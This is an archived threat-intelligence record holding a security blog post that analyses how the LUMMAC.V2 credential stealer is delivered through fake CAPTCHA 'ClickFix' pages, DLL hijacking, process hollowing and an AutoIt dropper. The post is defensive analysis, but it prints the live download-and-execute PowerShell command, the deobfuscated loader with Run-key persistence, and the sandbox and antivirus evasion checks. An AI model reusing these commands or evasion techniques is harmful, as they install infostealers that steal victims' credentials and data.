{ "id": "3a306aa1-312d-4ed2-82b9-dcbfbc1a900f", "created_at": "2026-04-06T00:09:54.611825Z", "updated_at": "2026-04-10T03:35:28.938957Z", "deleted_at": null, "sha1_hash": "d1a434b8dd6b88a04d06f4732290e056c930ec5c", "title": "Finding Malware: Unveiling LUMMAC.V2 with Google Security Operations - Part 1", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3351867, "plain_text": "Finding Malware: Unveiling LUMMAC.V2 with Google Security\r\nOperations - Part 1\r\nBy praveethdsouza\r\nPublished: 2025-04-30 · Archived: 2026-04-05 14:55:38 UTC\r\nWelcome to the Finding Malware Series\r\nThe \"Finding Malware\" blog series is authored to empower the Google Security Operations community to detect\r\nemerging and persistent malware threats. Our post dives deep into the LUMMAC.V2 malware family and the\r\ndetection opportunities available within Google Security Operations (SecOps). Happy hunting! \r\nAbout LUMMAC.V2\r\nAlso known as: Lumma, Lummac2, Lummastealer\r\n \r\nLUMMAC.V2 is a rework of the LUMMAC credential stealer written from C to C++, with a full-fledged binary\r\nmorpher. LUMMAC.V2 is an infostealer malware that targets a wide range of applications, including browsers,\r\ncrypto wallets, password managers, remote desktop applications, email clients, and instant messaging\r\napplications. It steals information such as credentials, logins, emails, personal and system details, screenshots, and\r\ncookies, subsequently sending this data over HTTP in a ZIP archive.\r\nLUMMAC.V2 is a prevalent malware family often distributed via the “ClickFix” technique, a social engineering\r\nmethod where victims are shown fake user verification CAPTCHA pages, tricking them into executing commands\r\n(e.g. MSHTA or PowerShell) using the Windows Run dialog box. This action initiates the  execution of a\r\nPowerShell payload in the background hidden from the user. This blog focuses on the malware infection chain\r\ndetailing three variations to deliver LUMMAC.V2 and execute it on the host.\r\nMalware Lifecycle\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 1 of 10\n\nDelivery, Execution, and Persistence\r\nThe infection begins with a simple internet search. Users searching for specific keywords, such as those related to\r\ncracked software, popular movies, or the latest music releases encounter malicious links within their search\r\nresults. Clicking on one of these links redirects them to a fake \"Verify You Are Human\" CAPTCHA page. \r\nThis page prompts the user to perform the following actions, mimicking the security check:\r\nPress Windows button + R (opens the Run dialog box)\r\nPress CTRL + V ( pastes a command that has been secretly copied to the user's clipboard)\r\nPress Enter (executes the command)\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 2 of 10\n\nThe figure below shows an example of the deceptive page in action, while figure 2 reveals the underlying\r\nwebsite’s source code.\r\nFigure 1: Fake captcha website\r\nFigure 2: Source code of the Fake captcha \r\nHere's the PowerShell command that's executed behind the scenes:\r\nPowerShell.exe -W Hidden -command $url = 'https://finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text\r\nFigure 3. Copied PowerShell Command\r\nThis command uses the Invoke-WebRequest PowerShell cmdlet to download a file called pnk3.txt from a\r\nmalicious website. The -W Hidden parameter ensures the PowerShell command will run in the background\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 3 of 10\n\nwithout any console window being displayed to the user. The command also reads the contents of the downloaded\r\npnk3.txt into memory and executes it using the Invoke-Expression (iex) cmdlet.\r\nThe downloaded pnk3.txt file contains the following:\r\n$PbnjVqGN = 'https://finalstepgo[.]com/uploads/pnk33.zip';\r\n$SdpCphfa = $env:APPDATA + '\\fNeizxDR';\r\n$WSRtQbHu = $env:APPDATA + '\\vm8D2hLX.zip';\r\n$WEcmPEsQ = $SdpCphfa + '\\Perspective.exe';\r\nif ( - not (TEst - paTh $SdpCphfa))  {\r\n    New - ITeM  - Path $SdpCphfa  - ItemType Directory \r\n};\r\nSTArT - BItSTrANSFEr  - Source $PbnjVqGN  - Destination $WSRtQbHu;\r\nEXPaNd - ArCHIVE  - Path $WSRtQbHu  - DestinationPath $SdpCphfa  - Force;\r\nRemovE - itEM $WSRtQbHu;\r\nStARt - PrOcEss $WEcmPEsQ;\r\nNEW - iTemPRopeRty  - Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'  - Name\r\n'tE1koeXl'  - Value $WEcmPEsQ  - PropertyType 'String';\r\nFigure 4: Malicious Powershell script\r\nThis PowerShell script is a malicious loader designed to execute in memory and perform the following:\r\nIt begins by downloading a malicious ZIP archive from a remote server using the Start-BitsTransfer\r\nPowerShell command. Subsequently, a directory is created within the user's AppData folder to serve as the\r\ndestination for the extracted files.\r\nThe downloaded ZIP file is then extracted using the Expand-Archive command, and its contents are saved\r\ninto the newly created directory within the AppData folder.\r\nAfter the extraction is complete, the script deletes the original ZIP file, further minimizing traces of the\r\nattack. \r\nFollowing the extraction, the script executes the malicious program, named Perspective.exe, using the\r\nStart-Process command.\r\nTo ensure persistence, the script adds a registry entry under\r\nHKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run. This registry entry, named tE1koeXl,\r\npoints to the path of the malicious executable, Perspective.exe, ensuring it is executed upon user logon. \r\nMandiant has discovered several variations of this malicious PowerShell script loader. Once executed, these\r\nloaders can initiate a variety of attacks to execute LUMMAC.V2, including:\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 4 of 10\n\nDLL Hijacking: Exploiting legitimate programs by introducing a malicious DLL with the same name that\r\nis loaded preferentially over the legitimate one.\r\nProcess Hollowing: Injecting malicious code into legitimate processes to conceal their activity.\r\nAutoIt-based Dropper: Utilizing the AutoIt scripting language to obfuscate and execute the\r\nLUMMAC.V2 information stealer.\r\nVariation 1: DLL Hijacking \r\nThis attack exploits a legitimate executable, vulnerable to DLL search order hijacking to execute the\r\nLUMMAC.V2 malware. \r\nIn this variation, a malicious PowerShell script loader initiates the process by downloading tmp.txt.zip, an archive\r\ncontaining the files Setup.exe and a specially crafted malicious DLL, tak_deco_lib.dll, as illustrated in the Figure\r\n5. \r\nFigure 5: Archive containing malicious payload\r\n \r\nWhen executed, Setup.exe intends to load a legitimate DLL but, due to the vulnerability, it inadvertently loads the\r\nmalicious tak_deco_lib.dll instead. This is clearly demonstrated in the figure below, where Setup.exe\r\nsuccessfully loads the malicious DLL from the same directory, ultimately executing the LUMMAC.V2 malware.\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 5 of 10\n\nFigure 6: Delivery using DLL search order hijacking\r\nVariation 2: Process Hollowing\r\nProcess hollowing is a multi-stage attack technique where malware hijacks a target process and replaces its\r\nlegitimate code with malicious code. Attackers use process hollowing for malware delivery because it allows them\r\nto disguise their malicious code within a legitimate process, making it harder for security tools to detect. \r\nIn this variation of LUMMAC.V2, a malicious PowerShell script loader drops and executes MyDockFinder.exe,\r\nan in-memory dropper written in Go. MyDockFinder.exe uses process hollowing to compromise the legitimate\r\nWindows process, BitlockerToGo.exe, by creating a new instance of BitlockerToGo.exe and replacing its\r\nprocess memory with malicious code. \r\nAn analysis of the API calls and techniques involved in this process hollowing follows below:\r\nFigure 7: Process Hollowing on BitlockerToGo.exe\r\nTo extract the injected payload, a crucial point for interception is just before the malware writes its code into the\r\ntarget process's memory using the NtWriteVirtualMemory API, as shown in the figure below:\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 6 of 10\n\nFigure 8: Extraction of the injected payload\r\nThe extracted payload, obtained from MyDockFinder.exe's memory at address 0x05480000, produced a SHA256\r\nhash of 842639021ac1b780ee77e7c40ca98745677cbf156764201638b6d33ac8c6f548. This hash allowed for\r\nfurther investigation, ultimately revealing the payload's identity as the LUMMAC.V2 malware as shown in the\r\nfigure below. \r\nFigure 9: Identification of the extracted payload\r\nVariation 3: AutoIt-based Dropper\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 7 of 10\n\nIn this variation, a malicious PowerShell script loader drops and executes a binary file named Vkcm1ks1s3.exe,\r\nwhich is a memory-only dropper implemented as a NSIS installation package. Upon execution, this binary drops\r\nmultiple malicious files into the user's temporary folder located at C:\\Users\u003cusername\u003e\\AppData\\Local\\Temp,\r\nas illustrated in the figure below:\r\nFigure 10: Files dropped by the malware\r\nVkcm1ks1s3.exe then executes the command to rename the Northwest file to Northwest.bat and run it:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c copy Northwest Northwest.bat \u0026 Northwest.bat\r\nThe Northwest.bat is a heavily obfuscated Windows batch file that once decoded, contains the following:\r\nFigure 11: Deobfuscated Northwest.bat file\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 8 of 10\n\nThis batch script is designed to evade detection and execute a malicious payload: \r\nObfuscation: The script hides its true commands using Set command variable assignments.\r\nAnti-Analysis Checks: \r\nIt scans for security applications like Webroot SecureAnywhere and Quick Heal AntiVirus. If\r\nfound, it initiates 186 pings to the loopback address. \r\nIt also checks for Avast Antivirus, AVG Antivirus, Bitdefender, Norton Security, and Sophos\r\nEndpoint Defence Software. If detected, it sets variables like Permanent.pif to AutoIT.exe and\r\nJgBvUTNMyahDmpGgfTNcnvh to .a3x, attempting to replace original filenames to evade\r\ndetection.\r\nPayload Delivery:\r\nIt creates a folder named 374415.\r\nIt uses findstr with the /V option to filter out lines containing the string\r\n\"CowReboundHeadingRedeem\" from a file named Beth and redirects the output to Permanent.pif.\r\nIt uses copy /b to append the contents of Elder to Permanent.pif (located in the 374415 directory),\r\nafter appending the contents of Elder, Permanent.pif is a legitimate AutoIt binary.\r\nIt navigates to the 374415 directory and concatenates files Suddenly, Guest, Foundation, Silence,\r\nTransfer, Hudson, and Franchise into A.a3x, an obfuscated AutoIt script.\r\nIt executes the AutoIt script A.a3x using the AutoIt binary Permanent.pif with start /I.\r\nDelay\r\nIt uses the Choice command to introduce a 5-second delay before exiting, allowing the payload to\r\nexecute.\r\nMandiant deobfuscated the AutoIt script (illustrated in the figure below). This script is a memory only dropper for\r\nthe Infostealer LUMMAC.V2.\r\nThe script initiates its execution with a series of anti-analysis checks:\r\nSandbox Evasion: It checks the host computer's name against the known AV emulators like tz\r\n(Bitdefender), NfZtFbPfH (Kaspersky), and ELICZ (AVG), and checks for the username test22,\r\ncommonly found in analysis setups.\r\nAntivirus Evasion:  It specifically targets Avast Antivirus by checking if the avastui.exe process is\r\ncurrently running.\r\nFigure 12.1: Sandbox and Antivirus Evasion\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 9 of 10\n\nAnti-Debugging: A time-based check using the GetTickCount API is employed to detect if the script is\r\nbeing run in a debugger or analyzed step-by-step.\r\nFigure 12.2: Anti-Debugging\r\nSimulated Internet Detection: It pings an invalid domain\r\n(HfhrdyrpMfGsKgEBCkTWjnP.HfhrdyrpMfGsKgEBCkTWjnP) to ensure it's not running in an\r\nisolated environment with fake internet services.\r\nIf any of the above checks are triggered, the script terminates.\r\nThe script deletes the original AutoIt script file (A.a3x) from the disk.\r\nFigure 12.3: Simulated Internet Detection and script deletion\r\nOnce the initial anti-analysis checks are passed, the script proceeds to construct its encrypted payload from a hex-string hardcoded within the script. To ensure compatibility, the script determines the process architecture (32-bit or\r\n64-bit) and utilizes the appropriate shellcode to copy and decrypt the hex-string into a designated memory buffer.\r\nThe script employs the RtlDecompressFragment API to decompress the payload, which was compressed using\r\nthe LZNT1 algorithm, before executing it in the memory. \r\nThe final payload executing in memory is identified to be LUMMAC.V2 malware.\r\nHaving detailed the intricate delivery, execution, and persistence mechanisms of LUMMAC.V2 in Part 1, we now\r\ntransition from how this potent infostealer establishes a foothold to understanding its communication and data\r\nexfiltration capabilities. Part 2 will thoroughly examine LUMMAC.V2's network communication, from its initial\r\nC2 server reconnaissance and sophisticated data staging to the methods it employs for exfiltrating stolen sensitive\r\ninformation.\r\nSource: https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nhttps://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110" ], "report_names": [ "899110" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434194, "ts_updated_at": 1775792128, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d1a434b8dd6b88a04d06f4732290e056c930ec5c.pdf", "text": "https://archive.orkl.eu/d1a434b8dd6b88a04d06f4732290e056c930ec5c.txt", "img": "https://archive.orkl.eu/d1a434b8dd6b88a04d06f4732290e056c930ec5c.jpg" } }